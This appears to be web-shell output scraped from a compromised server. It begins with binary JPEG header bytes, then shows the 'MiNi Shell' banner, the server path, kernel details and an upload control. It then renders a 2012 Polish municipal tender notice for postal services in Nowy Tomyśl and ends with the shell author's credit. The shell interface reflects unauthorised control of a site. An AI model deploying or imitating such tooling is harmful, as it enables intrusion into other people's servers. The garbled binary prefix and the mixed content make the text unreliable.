JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121218/517792-N-2012.html

<p class="kh_header"><b>Nowy Tomyśl: Nazwa  zadania: 
      Świadczenie na rzecz Urzędu Miejskiego w Nowym Tomyślu usług pocztowych 
      w obrocie krajowym i zagranicznym, ekonomicznych i priorytetowych, polegających 
      na przyjmowaniu, przemieszczaniu i doręczaniu przesyłek listowych nierejestrowa -
      nych, przesyłek listowych rejestrowanych (poleconych) i druków oraz zwrot przesyłek 
      niedoręczonych o wadze do 50g i powyżej 50g jak również paczek pocztowych</b><br>
<b>Numer ogłoszenia: 517792 - 2012; data zamieszczenia: 18.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Poznańska 33, 64-300 Nowy Tomyśl, woj. wielkopolskie, tel. 061 4426600, 4426641, faks 061 4422754.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowytomysl.pl - BIP - przetargi - ogłoszenia o przetargach - SPE 2312A</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nazwa  zadania: 
      Świadczenie na rzecz Urzędu Miejskiego w Nowym Tomyślu usług pocztowych 
      w obrocie krajowym i zagranicznym, ekonomicznych i priorytetowych, polegających 
      na przyjmowaniu, przemieszczaniu i doręczaniu przesyłek listowych nierejestrowa -
      nych, przesyłek listowych rejestrowanych (poleconych) i druków oraz zwrot przesyłek 
      niedoręczonych o wadze do 50g i powyżej 50g jak również paczek pocztowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia
 1) Przez przesyłki listowe i paczki objęte przedmiotem niniejszego zamówienia     
      Zamawiający rozumie: 
   a) zwykłe - przesyłki nierejestrowane, o wadze do 50g i powyżej 50g, które nie są  
       przesyłkami najszybszej kategorii w obrocie krajowym i zagranicznym. 
   b) zwykłe priorytetowe - przesyłki nierejestrowane, o wadze do 50g i powyżej 50g     
       najszybszej kategorii w obrocie krajowym i zagranicznym. 
   c) polecone - przesyłki rejestrowane, o wadze do 50g i powyżej 50g  przyjęte za   
       potwierdzeniem nadania, które nie są przesyłkami najszybszej kategorii w obrocie  
       krajowym i zagranicznym. 
  d) polecone priorytetowe - przesyłki rejestrowane, o wadze do 50g i powyżej 50g  
      przyjęte za potwierdzeniem nadania, najszybszej kategorii w obrocie krajowym 
      i zagranicznym. 
  e) polecone z potwierdzeniem odbioru - przesyłki rejestrowane, przyjęte za  
      potwierdzeniem nadania, które nie są przesyłkami najszybszej kategorii i doręczane 
      za zwrotnym potwierdzeniem odbioru. 
  f) polecone priorytetowe z potwierdzeniem odbioru - przesyłki rejestrowane, przyjęte  
      za potwierdzeniem nadania, najszybszej kategorii i doręczane za zwrotnym  
      potwierdzeniem odbioru. 
  g) paczki pocztowe - przesyłki w obrocie krajowym i zagranicznym 

 2)   Zamawiający przewiduje nadawanie przesyłek listowych o następujących gabarytach: 
    a) gabaryt A - przesyłki o wymiarach: 
      - minimum: wymiary strony adresowej nie mogą być mniejsze niż 90 x 140mm 
      - maksimum: żaden z wymiarów nie może przekroczyć: wysokości (grubości) 20 mm,   
        długości 325 mm, szerokości 230 mm. 
    b) gabaryt B - przesyłki o wymiarach: 
      - minimum: jeśli choć jeden z wymiarów przekracza wysokość 20 mm, lub długość  
        325 mm, lub szerokość 230 mm. 
      - maksimum: suma długości, szerokości i wysokości 900 mm, przy czym największy 
        z tych wymiarów (długość) nie może przekroczyć 600 mm. 
        Ustala się tolerancję wszystkich wymiarów +(- 2 mm. 

 3) Wykonawca musi zapewnić możliwość nadawania wszystkich przesyłek objętych  
     przedmiotem niniejszego zamówienia. 

 4) Przesyłki i paczki będą dostarczane i odbierane w siedzibie Wykonawcy (Nowy  
     Tomyśl, jeżeli inne miasto - odbiera Wykonawca). Wykonawca musi zapewnić  
      nadanie  przesyłek w dniu ich odbioru od  Zamawiającego.

 5) Objęte przedmiotem niniejszego zamówienia przesyłki dostarczane będą przez  
     Wykonawcę do każdego wskazanego na przesyłce miejsca w kraju i za granicą  
     objętego porozumieniami międzynarodowymi w tym zakresie. 

 6) Potwierdzenia odbioru przesyłek nadanych w sposób wymieniony w pkt. 1 ppkt. e i f  
     zawierające datę odbioru przesyłki i czytelny podpis odbiorcy, Wykonawca będzie  
     niezwłocznie doręczał do Zamawiającego - Nowy Tomyśl; ul. Poznańska 33.
 
 7) Przedstawiciel Wykonawcy w każdym przypadku nieobecności adresata przesyłki  
     pozostawi adresatowi zawiadomienie o próbie dostarczenia przesyłki. 

 8) Zamawiający wymaga aby koszt zwrotu przesyłki, niedoręczonej adresatowi z  
     przyczyn o których mowa w pkt. 7, nie przekraczał kwoty nadania przesyłki według 
     cen dla nadania przesyłki, która nie jest przesyłką najszybszej kategorii. 

 9) Przesyłki objęte przedmiotem niniejszego zamówienia nadawane będą w kopertach  
     (opakowaniach) Zamawiającego. 

 10) Zamawiający wymaga, aby datą wiążącą dla przesyłek listowych i paczek była data  
       nadania przesyłki w siedzibie Wykonawcy. 

 11) Roczna przewidywana ilość przesyłek, w tym poszczególnych rodzajów przesyłek  
       wymienionych w pkt. 1, została wskazana w formularzu cenowym stanowiącym  
       załącznik Nr 1A do opisu przedmiotu, z zastrzeżeniem, że rzeczywiste ilości 
       przesyłek jak i ich rodzaje będą wynikać z aktualnych potrzeb Zamawiającego, 
       a więc mogą odbiegać od ilości wskazanych w wyżej wymienionym załączniku. 
 12) Zamawiający wymaga, aby nadawanie przesyłek listowych, paczek pocztowych  
       obejmowało umieszczanie oznaczenia potwierdzającego wniesienie opłaty za usługę   
       w postaci nadruku pieczęci o treści: Opłata pobrana wg wzoru wskazanego przez 
       Wykonawcę. 
13) Świadczenie usług będących przedmiotem niniejszego postępowania odbywać się  
       będzie na podstawie zawartej umowy. 

 14) Okresem rozliczeniowym jest okres pełnego miesiąca kalendarzowego. 

 15) Zapłata za wykonane usługi będzie dokonywana przez Zamawiającego z dołu za  
       każdy okres rozliczeniowy na podstawie wystawionej faktury na wskazane na  
       fakturze konto bankowe Wykonawcy w terminie ustalonym w zawartej umowie 
       z zastrzeżeniem, że termin ten nie może być krótszy niż 14 dni od doręczenia 
       Zamawiającemu prawidłowo wystawionej faktury.

 16) Zamawiającemu przysługuje prawo korzystania z upustów oferowanych przez  
       Wykonawcę w okresie trwania umowy. 

 17) Reklamacje dotyczące niewykonania lub nienależytego wykonania usługi 
       Zamawiający będzie składał Wykonawcy po upływie 14 dni od nadania przesyłki  
       rejestrowanej, nie później jednak niż 12 miesięcy od dnia jej nadania. Termin 
       rozpatrzenia reklamacji nie może być dłuższy niż 30 dni od dnia jej złożenia. 

 18) Zamawiający zobowiązuje się do: 
     a) prawidłowego adresowania nadawanych przesyłek zgodnie z powszechnie  
         obowiązującymi normami w tym zakresie. 
     b) sporządzania dla nadawanych przesyłek zestawień ilościowo - wartościowych 
         w dwóch egzemplarzach, uwzględniających podział na przesyłki rejestrowane 
         i nierejestrowane, kategorie i podziały wagowe - książka nadawcza.

 19) Wymagany termin realizacji zamówienia: od 01.01.2013r. do 31.12.2013r
 
   U W A G I :
  
 1) Zamawiający dopuszcza możliwość wystąpienia umowy dodatkowej zgodnie z art. 67 
       ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (tekst jednolity : 
       Dz.U. z 2010r.; Nr 113, poz. 759 z późn. zm.),
  2) Zamawiający nie przewiduje możliwości składania ofert częściowych.
  3) Zamawiający nie dopuszcza możliwość składania ofert wariantowych.
  4) Zamawiający nie przewiduje składanie wadium i należyte zabezpieczenie umowy.
  5) Zamawiający nie przewiduje możliwości zawierania umowy ramowej,
  6) Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów,
  7) Zamawiający nie przewiduje rozliczenia w walutach obcych,
  8) Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem   
       aukcji elektronicznej,    
  9) Zamawiający dopuszcza porozumiewanie się faksem w sprawach istotnych 
      dotyczących specyfikacji lub umowy objętych zakresem zamówień publicznych 
      za pomocą faksu 61-44-22-754 (potwierdzone następnie listownie) lub listownie.    
 
 5. Warunki realizacji przedmiotu zamówienia :
  1) Realizacja przedmiotowych usług odbywać się będzie poprzez właściwe  
      przygotowanie przez Zamawiającego przesyłek pocztowych do nadania oraz  
      sporządzenie zestawienia ilościowego nadanych przesyłek nierejestrowanych oraz  
      zestawienia (książki nadawczej) dla przesyłek rejestrowanych. Przedmiotowe 
      zestawienia będą sporządzone w dwóch egzemplarzach , po jednym dla Wykonawcy 
      i Zamawiającego. Zamawiający umieszczać będzie na przesyłkach, w sposób czytelny 
      i trwały, informacje jednoznacznie identyfikujące adresata i nadawcę, określając 
      jednocześnie rodzaj przesyłki oraz znak opłaty. 
  2) Zamawiający wymaga, aby nadawanie przesyłek listowych, paczek pocztowych  
      obejmowało umieszczanie oznaczenia potwierdzającego wniesienie opłaty za usługę 
      w postaci nadruku pieczęci o treści: Opłata pobrana wg wzoru wskazanego przez 
      Wykonawcę.
  3) Zamawiający jest odpowiedzialny za nadawanie przesyłek  pocztowych w stanie  
      umożliwiającym Wykonawcy doręczenia ich do adresata bez ubytku i uszkodzenia,  
      określając jednocześnie rodzaj przesyłki i znak opłaty lub informację o sposobie  
      uiszczania opłaty za przesyłkę.
  4) Przesyłki i paczki będą dostarczane i odbierane w siedzibie Wykonawcy (Nowy 
      Tomyśl, jeżeli inne miasto - odbiera Wykonawca). Nadanie przesyłek musi    
      następować w dniu ich odbioru przez Wykonawcę od Zamawiającego. 
  5) Przedstawiciel Wykonawcy w każdym przypadku nieobecności adresata  przesyłki  
      pozostawi adresatowi zawiadomienie o próbie dostarczenia przesyłki.
  6) Niedoręczone przesyłki pocztowe Wykonawca zwróci Zamawiającemu, niezwłocznie  
      po wyczerpaniu możliwości ich doręczenia z podaniem przyczyny zwrotu. 
  7)  Nadawanie przesyłek pocztowych objętych przedmiotem zamówienia następować  
       będzie w dniach  ich przekazania Wykonawcy przez Zamawiającego.
  8) Zamawiający będzie korzystał wyłącznie ze swojego opakowania przesyłek, nie  
      dopuszcza się stosowania opakowań Wykonawcy. 
  9) Zamawiający będzie korzystał z druków potwierdzenia odbioru (własny druku lub   
      pocztowy)  zgodnie z art. 44 Kpa.
 
 6. W skład oferty wchodzi :
   a) koszt jednostkowy brutto za każdy rodzaj przesyłki według załącznika 1A,
   b) szacunkowa ilość przesyłek oraz wartość brutto według załącznika nr 1A służą 
       tylko do celów porównania złożonych ofert..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wykaże, iż posiada aktualny odpis zezwolenia na świadczenie usług pocztowych wydane przez Prezesa  
      Urzędu Komunikacji Elektronicznej zgodnie z art. 6 ustawy z dnia 12 czerwca 2003r. - 
      Prawo pocztowe, w zakresie uprawniającym do wykonywania działalności pocztowej,      
      lub jest wpisany do Rejestru Operatorów Pocztowych, lub oświadczy o ustawowym  zwolnieniu z uzyskania zezwolenia na świadczenie usług pocztowych zgodnie 
      z obowiązującymi przepisami prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany ceny, przedmiotu zamówienia lub umówionego terminu wykonania 
       zadania, jakie   w umowie dopuszcza Zamawiający:
a)  w zakresie ceny  umowy, która będzie odpowiadać rzeczywiście wykonanym 
     i potwierdzonym przez Zamawiającego  usługom pocztowym  wg cen  podanych 
     w ofercie, 
     b)  w zakresie przedmiotu i terminów wykonania:
   - z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego   
     wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć 
     z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi 
     lub grożącego powstaniem szkody w znacznych rozmiarach;
   - z powodu działań osób trzecich uniemożliwiających wykonanie zadania, które 
     to działania nie są konsekwencją winy którejkolwiek ze stron.

                Wprowadzenie zmian treści umowy wymaga sporządzenia pisemnego aneksu 
        do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowytomysl.pl - BIP - przetargi - ogłoszenia o przetargach - SPE 2312A<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski; ul. Poznańska 33;  64-300  Nowy Tomyśl;  pok. nr 14..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 08:30, miejsce: Urząd Miejski; ul. Poznańska 33;  64-300  Nowy Tomyśl;  pok. nr 28 - sekretariat Urzędu Miejskiego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com